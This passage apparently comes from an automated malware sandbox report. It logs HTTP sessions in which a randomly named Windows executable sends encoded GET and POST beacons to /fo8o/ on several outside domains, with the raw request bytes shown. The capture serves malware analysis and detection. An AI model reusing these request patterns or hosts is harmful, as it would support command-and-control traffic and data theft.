hoqoWSmVpgo9LFAiXV+3ATFfTUp3M/ORdIL9W5HMEMYRQdrBC4xm7TOamhSpoJEOTq0vwLGb6ca/n8JXcuO0IG5Q6M4u4aa46BD16QyGPHviBQfNYSnFlpqI45i3PHCfdSuQdg89HWvbTyICgg/Zx6i5NjktnT7vfwIJ4eVtFbR6uYzM2Ytvr74YSLms1pfePUvoLxo0pFFKtcZXCBBCKQHqbVOEjBevjoA8SSOXD4v/RgXxjFG4JN1IW4EJ+TWbxUSQWD [TRUNCATED]
Aug 12, 2024 13:03:18.799501896 CEST	637	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 11:03:18 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	54859	66.29.149.46	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:20.740803003 CEST	517	OUT	GET /fo8o/?wP=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&fPh4U=MJo4 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Aug 12, 2024 13:03:21.353380919 CEST	652	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 11:03:21 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	54860	195.110.124.133	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:26.466655016 CEST	802	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 69 31 55 77 34 49 32 58 75 43 48 37 6d 35 73 61 4e 51 5a 43 68 4c 45 2b 49 67 42 52 2f 6d 6a 2f 4a 7a 78 62 66 34 49 6f 66 65 4f Data Ascii: wP=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCii1Uw4I2XuCH7m5saNQZChLE+IgBR/mj/Jzxbf4IofeO
Aug 12, 2024 13:03:27.167577982 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 11:03:27 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	54861	195.110.124.133	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:29.123195887 CEST	826	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 72 47 2b 4b 34 7a 52 66 6d 4a 39 4a 4c 78 4a 49 30 76 6e 72 37 74 6d 63 54 68 61 35 54 4d 6d 2f 61 58 70 78 52 76 58 56 35 58 67 67 3d 3d Data Ascii: wP=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxrG+K4zRfmJ9JLxJI0vnr7tmcTha5TMm/aXpxRvXV5Xgg==
Aug 12, 2024 13:03:29.798368931 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 11:03:29 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	54862	195.110.124.133	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:31.658974886 CEST	1839	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 4b 45 6d 4a 69 66 2f 6c 61 30 52 55 6f 71 73 39 59 75 50 4b 61 30 34 35 6f 58 44 76 4a 72 39 54 6f 4b 68 32 75 48 2b 75 48 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 62 54 36 47 39 65 70 54 43 41 32 44 30 2b 48 4f 52 30 2f 61 35 73 62 33 65 54 58 39 46 58 6d 53 30 46 41 37 63 52 76 47 69 43 72 6e 69 79 61 79 78 6a 59 54 77 75 42 64 6d 69 42 56 62 6c 74 6d 7a 6b 6f 59 76 2f 6b 74 6a 34 2b 54 42 6a 65 6b 46 70 64 48 [TRUNCATED] Data Ascii: wP=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWKEmJif/la0RUoqs9YuPKa045oXDvJr9ToKh2uH+uHZ5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqbT6G9epTCA2D0+HOR0/a5sb3eTX9FXmS0FA7cRvGiCrniyayxjYTwuBdmiBVbltmzkoYv/ktj4+TBjekFpdHNzeNHxy9Pcw24vdDItt+e8WTbZ9URuazYWsp568/f0yKCjRfcltj/CA1fR61rMc9wdk4KaradY6Pdc7076uQy+eLO0Q7KYt/TQgmZS3EbjuUCmO3rbsQ1pg9d4mkADNwjYqc53IOT7JXCtaQXK99mv+mn+8LZPNINpu+Qxsl1QHCywTU7xudlwhT8JJRRErNA2xxuNbLuFFABdhBU1HJ7stU7WFTyLLMWe48zP3XOe1lGfqBSFn9lU+mJOWFkDenbEMP2uzR6vx3qmt02agNXgQMf433nniF72arU/+HzfMx3jHkODTNmUud0+TuZwgo8waZmP+Lk5pBsgRWXcZ3Sbk0ZdOcgtB9mqWbW8TV3q2k+2jaWmoHGYnEgXqbQpn9V6ujEY+nrii6iZI3iPk9fxDRDpw02r9pwl7b0gP/uQMCVDbXc8focD0by28eXd4VXTGobiMOnUYVo4z2TFUUFP+aM/5oOhDjlxawgNSNEHkwsgBuyeOrKEXNOhnzk6R0jzAkXvJCu5eMpVQV3ari5ZVVbWHpxc+q1ZKrPTWm5T9YSJR1aNzgCyM/vpEdo39GOX49YKRPj1lUtwqc6YNKe3Bp+KVtkNYcP6JmvgTk0HTczTJZunfRUgRAQjzoxmITZTBJgAFKZjg0Bv8ZGbFgEA1eLCJASFLds9 [TRUNCATED]
Aug 12, 2024 13:03:32.431184053 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 11:03:32 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	54863	195.110.124.133	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:34.189029932 CEST	523	OUT	GET /fo8o/?wP=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&fPh4U=MJo4 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Aug 12, 2024 13:03:34.868436098 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 11:03:34 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	54864	15.197.240.20	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:40.389154911 CEST	796	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 70 49 35 67 38 45 2f 39 70 39 35 6e 63 76 6d 35 51 55 38 4a 4f 34 30 59 59 6f 38 35 5a 77 34 37 77 67 71 75 79 7a 5a 64 73 79 66 74 Data Ascii: wP=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDpI5g8E/9p95ncvm5QU8JO40YYo85Zw47wgquyzZdsyft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	54865	15.197.240.20	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:42.929091930 CEST	820	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 55 61 59 71 6b 4c 5a 51 34 52 79 67 53 75 67 6b 56 36 6a 47 36 4f 6d 69 6f 6b 53 65 55 43 6f 42 5a 58 7a 6e 55 52 42 77 46 63 4f 41 3d 3d Data Ascii: wP=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoUaYqkLZQ4RygSugkV6jG6OmiokSeUCoBZXznURBwFcOA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	54866	15.197.240.20	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:03:45.456237078 CEST	1833	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 4e 51 43 65 61 4b 50 46 6f 58 4a 72 49 32 59 5a 45 2b 43 47 30 56 38 6a 75 47 70 6e 51 50 39 55 6d 6d 39 47 6b 54 47 4d 4e 75 6f 42 35 5a 34 57 55 66 58 41 41 44 64 48 6e 4e 47 2b 62 57 39 71 43 2b 4d 35 46 79 33 72 65 72 30 4b 67 54 48 56 47 63 33 32 68 30 6a 56 33 70 44 55 67 69 67 74 65 55 32 2b 77 6e 4d 46 36 70 6b 47 77 69 58 50 4d 56 73 6e 66 7a 45 64 69 48 7a 62 38 74 4a 33 6c 59 4f 2b 74 34 4d 4d 54 78 76 37 49 4f 43 50 59 77 71 42 4d 76 6b 4d 34 61 34 4e 57 79 66 4e 79 4c 55 6f 33 [TRUNCATED] Data Ascii: 